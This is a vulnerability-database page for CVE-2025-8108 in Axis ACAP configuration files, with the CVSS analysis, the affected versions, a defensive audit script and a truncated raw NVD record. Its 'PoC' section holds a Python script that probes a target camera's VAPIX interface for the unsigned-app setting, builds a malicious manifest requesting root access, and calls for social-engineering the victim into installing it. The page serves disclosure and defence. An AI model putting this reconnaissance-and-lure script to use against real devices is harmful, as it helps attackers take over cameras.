Security Vulnerability Report
CVE-2025-8108 CVSS 6.7 MEDIUM

CVE-2025-8108

Published: 2025-11-11 07:15:36
Last Modified: 2025-11-24 17:56:23

Description

An ACAP configuration file has improper permissions and lacks input validation, which could potentially lead to privilege escalation. This vulnerability can only be exploited if the Axis device is configured to allow the installation of unsigned ACAP applications, and if an attacker convinces the victim to install a malicious ACAP application.

CVSS Details

CVSS Score
6.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Weaknesses
CWE-732 (Incorrect Permission Assignment for Critical Resource), CWE-1287 (Improper Validation of Specified Type of Input)

The vector is scored from the position of an already-installed local application running with high privileges (AV:L, PR:H, UI:N). The precondition the description spells out, an operator being talked into installing an unsigned ACAP package on a device that permits it, is not reflected in the vector, so treat 6.7 as the post-install impact rather than the end-to-end attack difficulty.

Configurations (Affected Products)

cpe:2.3:o:axis:axis_os:*:*:*:*:active:*:*:* - VULNERABLE (versionStartIncluding 12.0.0, versionEndExcluding 12.7.33, per the NVD match criteria in the raw record below)
cpe:2.3:h:axis:a1210_\(-b\):-:*:*:*:*:*:*:* - hardware platform node (vulnerable=false in the NVD data)
cpe:2.3:h:axis:a1214:-:*:*:*:*:*:*:* - hardware platform node (vulnerable=false in the NVD data)
cpe:2.3:h:axis:a1601:-:*:*:*:*:*:*:* - hardware platform node (vulnerable=false in the NVD data)
cpe:2.3:h:axis:a1610_\(-b\):-:*:*:*:*:*:*:* - hardware platform node (vulnerable=false in the NVD data)
cpe:2.3:h:axis:a1710-b:-:*:*:*:*:*:*:*:* - hardware platform node (vulnerable=false in the NVD data)

The hardware entries are the second node of an AND configuration in the NVD record: they name devices on which the affected Axis OS track runs. "vulnerable: false" on a hardware node is NVD's convention for a platform ("running on/with") entry, not a statement that those models are unaffected; a listed model running Axis OS 12.0.0 up to but not including 12.7.33 is in scope.

All devices that support Axis ACAP applications (exact affected versions per the Axis security advisory).
Axis devices with the setting that allows installation of unsigned ACAP applications enabled.
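The advisory pairs this CVE with CWE-732 (a critical config file with loose permissions) and CWE-1287 (a config reader that does not validate the type of what it reads), and the NVD record gives the affected Axis OS range. The script below is an added example, not Axis code and not part of the advisory: it is the kind of local audit an ACAP developer or device administrator would run against the same weakness classes. The version bounds come from the NVD match criteria on this page; the manifest field names, the permission allow-list and the stat() values fed to the checks are assumptions constructed for the illustration, since the advisory does not name the configuration file or its schema.

```python
"""
Added example (not Axis code, not from the advisory): local audit helpers for
the two weakness classes NVD tags on CVE-2025-8108, plus a version check against
the affected Axis OS range recorded in the NVD configuration (>= 12.0.0, < 12.7.33).
The ACAP manifest keys and permission names below are assumptions for the
illustration; the advisory does not name the file or its schema.
"""
import json
import stat

AFFECTED_START = (12, 0, 0)    # versionStartIncluding, from the NVD record on this page
AFFECTED_END = (12, 7, 33)     # versionEndExcluding, from the NVD record on this page


def parse_version(text):
    """Turn '12.7.32' into a comparable tuple; anything but x.y.z raises ValueError."""
    parts = tuple(int(p) for p in text.strip().split("."))
    if len(parts) != 3:
        raise ValueError(f"unexpected version format: {text!r}")
    return parts


def version_in_affected_range(text):
    """True if the Axis OS version falls inside the range NVD marks vulnerable."""
    return AFFECTED_START <= parse_version(text) < AFFECTED_END


def permission_findings(mode, uid, trusted_uids=(0,)):
    """CWE-732 check on a critical config file's stat() fields (st_mode, st_uid).

    A config file that an unprivileged app account can write, or that is not
    owned by a trusted account, lets a malicious (unsigned) ACAP rewrite what a
    privileged component later reads. Returns a list of findings; empty is clean.
    """
    findings = []
    if uid not in trusted_uids:
        findings.append(f"owner uid {uid} is not a trusted account")
    if mode & stat.S_IWOTH:
        findings.append("world-writable")
    if mode & stat.S_IWGRP:
        findings.append("group-writable")
    if mode & (stat.S_ISUID | stat.S_ISGID):
        findings.append("setuid/setgid bit set on a data file")
    return findings


# Assumed schema for the illustration: key -> (expected type, element type or None)
ASSUMED_SCHEMA = {
    "app_name": (str, None),
    "version": (str, None),
    "permissions": (list, str),
}
# Assumed allow-list; a real reader would take this from the platform's policy
ASSUMED_ALLOWED_PERMISSIONS = {"network_access", "storage_read", "storage_write"}


def validate_config(raw_json):
    """CWE-1287 check: reject values of the wrong type (and unknown keys or
    permissions) before a privileged reader acts on them. Empty list = accepted."""
    problems = []
    try:
        cfg = json.loads(raw_json)
    except json.JSONDecodeError as exc:
        return [f"not valid JSON: {exc.msg}"]
    if not isinstance(cfg, dict):
        return ["top-level value is not an object"]
    for key, (expected, elem) in ASSUMED_SCHEMA.items():
        if key not in cfg:
            problems.append(f"missing key {key!r}")
            continue
        value = cfg[key]
        if type(value) is not expected:
            problems.append(f"{key!r} must be {expected.__name__}, got {type(value).__name__}")
            continue
        if elem is not None and any(type(x) is not elem for x in value):
            problems.append(f"every element of {key!r} must be {elem.__name__}")
    for key in cfg:
        if key not in ASSUMED_SCHEMA:
            problems.append(f"unexpected key {key!r}")
    perms = cfg.get("permissions")
    if isinstance(perms, list):
        for p in perms:
            if isinstance(p, str) and p not in ASSUMED_ALLOWED_PERMISSIONS:
                problems.append(f"permission {p!r} is not in the allow-list")
    return problems


if __name__ == "__main__":
    # Constructed sample inputs: a root-owned but world-writable file (mode 0666)
    # and a manifest asking for a permission outside the allow-list.
    print(version_in_affected_range("12.7.32"), version_in_affected_range("12.7.33"))
    print(permission_findings(0o100666, 0))
    print(validate_config('{"app_name": "demo", "version": "1.0", "permissions": ["root_access"]}'))
```

On a device, the stat() fields would come from `os.stat(path)` of the real configuration file; the functions take the raw numbers so the checks can be exercised offline. The type checks use `type(x) is` rather than `isinstance` deliberately, so that a `bool` does not pass as an `int` or a subclass smuggle through a check that a privileged reader relies on.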

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-8108 PoC - ACAP Configuration File Exploitation
# Note: This is a conceptual PoC for educational and security research purposes only
# Unauthorized exploitation of this vulnerability is illegal
#
# What this script actually does: it queries the device's VAPIX parameter list
# for the "allow unsigned apps" setting and builds a conceptual manifest. It does
# not touch the configuration-file weakness itself; that step is the
# social-engineering install described in the advisory.
import json

import requests
from requests.auth import HTTPDigestAuth

TARGET_IP = "<target_device_ip>"
# VAPIX CGIs require device credentials (digest auth); placeholders only
USERNAME = "<device_user>"
PASSWORD = "<device_password>"
# Illustrative path from the original PoC; the advisory does not name the file
ACAP_CONFIG_PATH = "/etc/acap_config/app_config.json"


def check_unsigned_app_enabled(target_ip, auth=None):
    """Check if unsigned ACAP apps are allowed.

    The parameter string "UnsignedApps=enabled" is as written in the original
    PoC and is not verified against the VAPIX parameter documentation.
    """
    config_url = f"http://{target_ip}/axis-cgi/param.cgi?action=list&group=apps"
    try:
        response = requests.get(config_url, auth=auth, timeout=10)
        if response.status_code != 200:
            print(f"[-] param.cgi returned HTTP {response.status_code}")
            return False
        if "UnsignedApps=enabled" in response.text:
            return True
    except requests.RequestException as e:
        print(f"Error checking config: {e}")
    return False


def create_malicious_acap():
    """Generate a conceptual malicious ACAP package manifest.

    This dict is illustrative only; it is not the real ACAP manifest.json schema.
    """
    malicious_config = {
        "app_name": "malicious_acap",
        "version": "1.0",
        "permissions": ["root_access", "config_write", "network_access"],
        "post_install_script": "exploit.sh",
    }
    return json.dumps(malicious_config)


def exploit_cve_2025_8108(target_ip):
    """Exploit ACAP configuration permission vulnerability (conceptual: reconnaissance only)."""
    print(f"[*] Targeting {target_ip}")
    auth = HTTPDigestAuth(USERNAME, PASSWORD)
    if not check_unsigned_app_enabled(target_ip, auth):
        print("[-] Unsigned ACAP apps not enabled")
        return False
    print("[+] Unsigned ACAP apps enabled - vulnerability may be exploitable")
    print("[*] Generate malicious ACAP package...")
    malicious_payload = create_malicious_acap()
    print(f"[+] Malicious config created: {malicious_payload}")
    print("[*] Next step: Social engineer victim to install the ACAP package")
    return True


if __name__ == "__main__":
    exploit_cve_2025_8108(TARGET_IP)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-8108", "sourceIdentifier": "[email protected]", "published": "2025-11-11T07:15:36.413", "lastModified": "2025-11-24T17:56:23.093", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An ACAP configuration file has improper permissions and lacks input validation, which could potentially lead to privilege escalation. This vulnerability can only be exploited if the Axis device is configured to allow the installation of unsigned ACAP applications, and if an attacker convinces the victim to install a malicious ACAP application."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-732"}, {"lang": "en", "value": "CWE-1287"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:axis:axis_os:*:*:*:*:active:*:*:*", "versionStartIncluding": "12.0.0", "versionEndExcluding": "12.7.33", "matchCriteriaId": "CA971CF4-A732-4CA1-B8A3-D49BE30B3CE2"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:axis:a1210_\\(-b\\):-:*:*:*:*:*:*:*", "matchCriteriaId": "A1CDF5C3-76A2-4D39-91C7-0F6D76EA2D0C"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:a1214:-:*:*:*:*:*:*:*", "matchCriteriaId": "C6BB6630-7BE9-4458-8778-9D6D03BE18E0"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:a1601:-:*:*:*:*:*:*:*", "matchCriteriaId": 
"1D256893-7BD3-40A6-9877-2DED01770AC5"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:a1610_\\(-b\\):-:*:*:*:*:*:*:*", "matchCriteriaId": "02A7D1B6-D87A-47DF-8CB4-76AD56B450EA"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:a1710-b:-:*:*:*:*:*:*:*", "matchCriteriaId": "AEBFC01F-286A-4FFC-B89D-BC6B9EE4B8C3"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:a1810-b:-:*:*:*:*:*:*:*", "matchCriteriaId": "FA6D214C-F555-44A9-952C-E53E00D6A77C"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:a8207-ve_mk_ii:-:*:*:*:*:*:*:*", "matchCriteriaId": "CB61500A-D634-436C-8BE9-00CEEC301B55"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:c1110-e:-:*:*:*:*:*:*:*", "matchCriteriaId": "E1321FB3-DCD0-414A-BC7E-34CB8CAFCC1A"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:c1111-e:-:*:*:*:*:*:*:*", "matchCriteriaId": "9FFCF55C-BDCE-46AD-A1D4-208F27800F5E"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:c1210-e:-:*:*:*:*:*:*:*", "matchCriteriaId": "1BF027AB-CD4E-4E25-BA5D-63501B544001"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:c1211-e:-:*:*:*:*:*:*:*", "matchCriteriaId": "55CF4F2F-6FA7-47AC-9C8E-71CCAB97E166"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:c1310-e_mk_ii:-:*:*:*:*:*:*:*", "matchCriteriaId": "55D1250F-54EB-46EE-AFBB-6C0C509A40CE"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:c1410_mk_ii:-:*:*:*:*:*:*:*", "matchCriteriaId": "1950A515-C3EC-4A2B-858F-22099AEA83DD"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:c1510:-:*:*:*:*:*:*:*", "matchCriteriaId": "5A49250A-CB14-4D29-9D6A-15369392147A"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:c1511:-:*:*:*:*:*:*:*", "matchCriteriaId": "4FB5EDDB-5C7F-4C39-AA7B-C26B638BAF64"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:c1610-ve:-:*:*:*:*:*:*:*", "matchCriteriaId": "72DC480C-B6C1-4E76-BDB7-BC86729C2A71"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:c1710:-:*:*:*:*:*:*:*", "matchCriteriaId": "2EFEC3A4-559A-4DBC-92BB-A22AF7245FF9"}, {"vulnerable": false, "criteria": 
"cpe:2.3:h:axis:c1720:-:*:*:*:*:*:*:*", "matchCriteriaId": "B8470994-3AB3-431F-8901-DBE5CB4A4384"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:c6110:-:*:*:*:*:*:*:*", "matchCriteriaId": "AF22B591-6B05-4097-BD0E-B13A1D02A6B7"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:c8110:-:*:*:*:*:*:*:*", "matchCriteriaId": "44E69A37-BB22-4340-98F8-6C13B90B5F6B"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:c8210:-:*:*:*:*:*:*:*", "matchCriteriaId": "65B41008-04FD-4D4F-8BFB-8121CF889A6C"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:d1110:-:*:*:*:*:*:*:*", "matchCriteriaId": "B4833075-CCD0-4CC5-812E-6122C0C351C9"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:d201-s_xpt_q6075:-:*:*:*:*:*:*:*", "matchCriteriaId": "DBF859C1-5C9F-422A-813C-ADB7418F02AE"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:d2110-ve:-:*:*:*:*:*:*:*", "matchCriteriaId": "FF927000-C686-41E3-96EA-2C3C764FC2D3"}, {"vulnerable": false, "criteria": "cpe:2.3:h:axis:d2210-ve:-:*:*:*:*:*:*:*", "matchCrite ... (truncated)